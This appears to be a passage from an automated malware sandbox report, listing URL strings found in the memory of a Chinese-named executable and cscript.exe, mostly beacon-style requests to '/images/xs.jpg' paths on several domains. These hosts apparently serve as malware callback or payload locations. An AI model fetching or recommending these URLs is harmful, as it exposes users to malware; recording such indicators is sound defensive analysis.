        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?5e57086d=-1805567237
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?6685e72=645019308
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?7b245cb2=-326012216
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?7b245cb2=-326012216B
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?7b245cb2=-326012216F
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?8d5f7dbb=897447660
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?90e4380b=1133568044
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?90e4380b=11335680442&_
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?93473576=646867692
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?9a20876f=88427094
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?9a20876f=88427094s
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?b36f01f5=1725826026
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?b36f01f5=1725826026fA
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?cfe83619=260640381
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?cfe83619=260640381L&A
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?e60800=75376640L
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?ee51bd01=-593266174
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpghttp://www.careerdesk.org/images/xs.jpghttp://arthur.niria.biz/xs.j
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?1
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?13a89f9=164909000
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?1964acc0=1278084672
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?1H
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?1b99da6=86825202
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?1c98993=269866539
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?27da790=167157312s.Tz
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?325396b5=-1835223640
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?362c1e4=113607624#.
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?37f8d56f=1339359386
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?37f8d56f=1339359386L
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?434c9e5=282273684
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?45eba6e7=794638136
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?59e2a88=565509936
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?626616cd=-335646207
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?811c5c4=406147404#
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?811c5c4=406147404dS.tz
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?84b38e=43483590
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?84b38e=43483590:
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?8a282b2c=-954651084
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?a5242bcc=-834303444
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?a5242bcc=-834303444LEu
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?a8241ece=-1855376372
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?a8241ece=-18553763721
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?e4bc5c05=1550460958
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?e4bc5c05=1550460958LCuy
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?105cc6e8=823547064
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?177b7c4b=-749248861
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?177b7c4b=-749248861_
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?223453a1=573854625
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?223453a1=573854625A
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?5f3bd7f4=-102842464
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?62d506=64770620
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?62d506=64770620M
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?73b8b348=-2059992880
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?73b8b348=-20599928806
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?73b8b348=-2059992880Z
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?73b8b348=-2059992880q
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?7591ea6=1109529558
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?8660f531=856140168ON
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9d5d58f=660035132
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9d5d58f=660035132170
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9d5d58f=660035132P
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9d5d58f=660035132W?=
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9d5d58f=660035132_
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9d5d58f=660035132l
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9d5d58f=660035132urity
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9d5d58f=660035132x
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9de48b26=-1928797098
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9de48b26=-1928797098j
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?a524d199=690392264
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?ae2be931=352810790
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?ba897d5a=-1165394598
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?c46dd74c=-702204804
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?c46dd74c=-702204804f
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?c8127ba=419581812
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?da340bf8=1758474208u
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?e84f9f45=-397435067
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?e84f9f45=-397435067e
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?f619fdc=1806393092o
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?f6512876=-1299627088
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?f6512876=-1299627088L
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?fc1317fd=-526860312
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?fd1cebdb=-48436261
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?fd1cebdb=-48436261L
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?10da53c=53014452
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?1208a479=1210225124
